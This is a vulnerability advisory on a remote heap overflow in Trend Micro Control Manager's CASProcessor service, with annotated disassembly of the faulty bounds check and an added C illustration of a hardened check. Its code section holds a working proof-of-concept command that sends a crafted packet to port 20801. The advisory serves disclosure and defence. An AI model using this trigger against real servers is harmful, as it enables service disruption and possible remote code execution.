#######################################################################

Luigi Auriemma

Application:  Trend Micro Control Manager
              http://us.trendmicro.com/us/products/enterprise/control-manager/
              note that the vulnerable dll seems used also in other Trend
              Micro products like ServerProtect and OfficeScan
              (EntityMain.exe? search on google) but I have not verified it
              yet and, if confirmed, I don't know if it must be counted as a
              separate vulnerability
Versions:     <= 5.5 1250
Platforms:    Windows
Bug:          heap overflow in En_Utility.dll
Exploitation: remote, versus server
Date:         probably found 21 Nov 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

???

#######################################################################

======
2) Bug
======

CASProcessor.exe is a child service of ProcessManager.exe running on
port 20801 and automatically restarted every time it crashes or
terminates.

The service is vulnerable to a heap overflow during the handling of the
BLOB encrypted data, caused by an integer overflow in the following
instructions of En_Utility.dll:

  100378F3  . 8B08           MOV ECX,DWORD PTR DS:[EAX]             ; the 32bit value
  100378F5  . 51             PUSH ECX                               ;
  100378F6  . FF15 94130410  CALL DWORD PTR DS:[<&WSOCK32.#14>]     ; \ntohl
  100378FC  . 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
  100378FF  . 8B55 F0        MOV EDX,DWORD PTR SS:[EBP-10]          ; input buffer
  10037902  . 83C2 04        ADD EDX,4
  10037905  . 8955 F0        MOV DWORD PTR SS:[EBP-10],EDX
  10037908  . 8B45 F0        MOV EAX,DWORD PTR SS:[EBP-10]
  1003790B  . 0345 FC        ADD EAX,DWORD PTR SS:[EBP-4]           ; buffer + 32bit value
  1003790E  . 8B4D 08        MOV ECX,DWORD PTR SS:[EBP+8]           ; input buffer (again)
  10037911  . 034D 0C        ADD ECX,DWORD PTR SS:[EBP+C]           ; buffer + BLOB size we provided
  10037914  . 3BC1           CMP EAX,ECX
  10037916  . 76 0A          JBE SHORT En_Utili.10037922
  10037918  . B8 12FCFFFF    MOV EAX,-3EE
  1003791D  . E9 83010000    JMP En_Utili.10037AA5
  10037922  . 6A 04          PUSH 4
  10037924  . 8D55 FC        LEA EDX,DWORD PTR SS:[EBP-4]
  10037927  . 52             PUSH EDX
  10037928  . 8B4D 10        MOV ECX,DWORD PTR SS:[EBP+10]
  1003792B  . E8 80DAFFFF    CALL En_Utili.100353B0                 ; copying of 4 bytes
  10037930  . 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
  10037933  . 50             PUSH EAX
  10037934  . 8B4D F0        MOV ECX,DWORD PTR SS:[EBP-10]
  10037937  . 51             PUSH ECX
  10037938  . 8B4D 10        MOV ECX,DWORD PTR SS:[EBP+10]
  1003793B  . E8 70DAFFFF    CALL En_Utili.100353B0                 ; copying of 12 bytes plus those specified in our 32bit

The bounds check at 10037914 adds the attacker-supplied 32bit value to
the buffer pointer, so a value close to 0xffffffff wraps the sum around
and the check passes although the length is far larger than the BLOB.
Further integer overflows happen in the 100353B0 function (something
like a static_realloc+memcpy), which allows some of its checks to be
bypassed and the vulnerability to be exploited, since it allocates only
0x8000 bytes of memory.

Such instructions are reached through a packet having opcode 0x1391
"HandleMcpRequest" containing malformed BLOB encryption data with the
opcode 1 or 3 followed by the 32bit field in the range 0xffff8000 to
0xffffffff.

The opcode 0x13a7 "HandleMsgFromProLib" also uses BLOB encrypted data
but doesn't call this specific vulnerable function used by 0x1391,
that's why only that opcode can exploit the vulnerability.

After the heap overflow it's also possible to corrupt additional memory
through the sending of other packets, with the consequence of
controlling registers and possibly the code flow.
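The following C program is an added illustration of the length-check pattern behind this bug; it is not code from En_Utility.dll or from the advisory, and the function names, the address 0x00400000 and the sample BLOB bytes are constructed for the example. The 32-bit comparison `buffer + 4 + length <= buffer + blob_size` is modelled with uint32_t so that the wrap-around reproduces on any host, and it is placed beside a hardened check that compares lengths against the bytes remaining in the BLOB and the destination capacity instead of adding an untrusted length to a pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Destination capacity: mirrors the 0x8000-byte allocation the advisory mentions. */
#define FIELD_CAPACITY 0x8000u

/* Hypothetical reconstruction of the 32-bit comparison (not the DLL's own code):
 * the check is done on addresses, so in a 32-bit process buffer + 4 + field_len
 * wraps around when field_len is near 0xffffffff and a huge length "fits".
 * uint32_t stands in for the 32-bit pointers so the wrap is reproducible. */
int field_fits_vulnerable(uint32_t buf_addr, uint32_t blob_size, uint32_t field_len)
{
    uint32_t p         = buf_addr + 4;          /* skip the 32-bit length word      */
    uint32_t field_end = p + field_len;         /* wraps modulo 2^32                */
    uint32_t blob_end  = buf_addr + blob_size;  /* buffer + BLOB size we provided   */
    return field_end <= blob_end;               /* the JBE: passes for huge lengths */
}

/* Hardened check: never add an untrusted length to a pointer. Compare lengths
 * only, against the bytes still unread in the BLOB and against the capacity of
 * the destination the field will be copied into. */
int field_fits_fixed(size_t blob_size, size_t consumed, uint32_t field_len, size_t dest_capacity)
{
    if (consumed > blob_size)
        return 0;
    size_t remaining = blob_size - consumed;    /* cannot underflow after the test above */
    if (field_len > remaining)
        return 0;
    if (field_len > dest_capacity)
        return 0;
    return 1;
}

/* Big-endian 32-bit read, i.e. what ntohl() yields on a little-endian host. */
static uint32_t read_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parses one length-prefixed field with the hardened check.
 * Returns the number of bytes copied into dest, or -1 when the field is
 * malformed (length exceeds the BLOB or the destination capacity). */
long parse_blob_field(const unsigned char *blob, size_t blob_size,
                      unsigned char *dest, size_t dest_capacity)
{
    if (blob_size < 4)
        return -1;
    uint32_t field_len = read_be32(blob);
    if (!field_fits_fixed(blob_size, 4, field_len, dest_capacity))
        return -1;
    memcpy(dest, blob + 4, field_len);
    return (long)field_len;
}

int main(void)
{
    /* Constructed inputs: one well-formed field and one carrying the
     * 0xffffffff length the advisory describes. */
    static const unsigned char good[] = { 0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o' };
    static const unsigned char bad[]  = { 0xff, 0xff, 0xff, 0xff, 'x', 'x' };
    static unsigned char dest[FIELD_CAPACITY];

    printf("vulnerable check, len=0xffffffff: fits=%d\n",
           field_fits_vulnerable(0x00400000u, 0x20u, 0xffffffffu));
    printf("fixed check,      len=0xffffffff: fits=%d\n",
           field_fits_fixed(0x20, 4, 0xffffffffu, FIELD_CAPACITY));
    printf("parse good: %ld bytes\n", parse_blob_field(good, sizeof good, dest, sizeof dest));
    printf("parse bad:  %ld\n",       parse_blob_field(bad,  sizeof bad,  dest, sizeof dest));
    return 0;
}
```

The vulnerable model returns 1 for a 0x20-byte BLOB and a 0xffffffff length because 0x00400004 + 0xffffffff wraps to 0x00400003, which is below the BLOB end; the fixed check rejects the same input, and the parser therefore never reaches the memcpy. The second capacity test matters on its own: a length that fits inside the BLOB can still exceed a fixed-size destination such as the 0x8000-byte allocation the advisory describes.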
#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -b 0x61 -l 0 -c "\x00\x11\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\x91\x13\xff\xff\xff\xff\xff\xffaction=blah&slf_productguid=blah&msgver=blah&\r\n\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\xff\xff\xff\xff" -T SERVER 20801 0x110000

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-235/

#######################################################################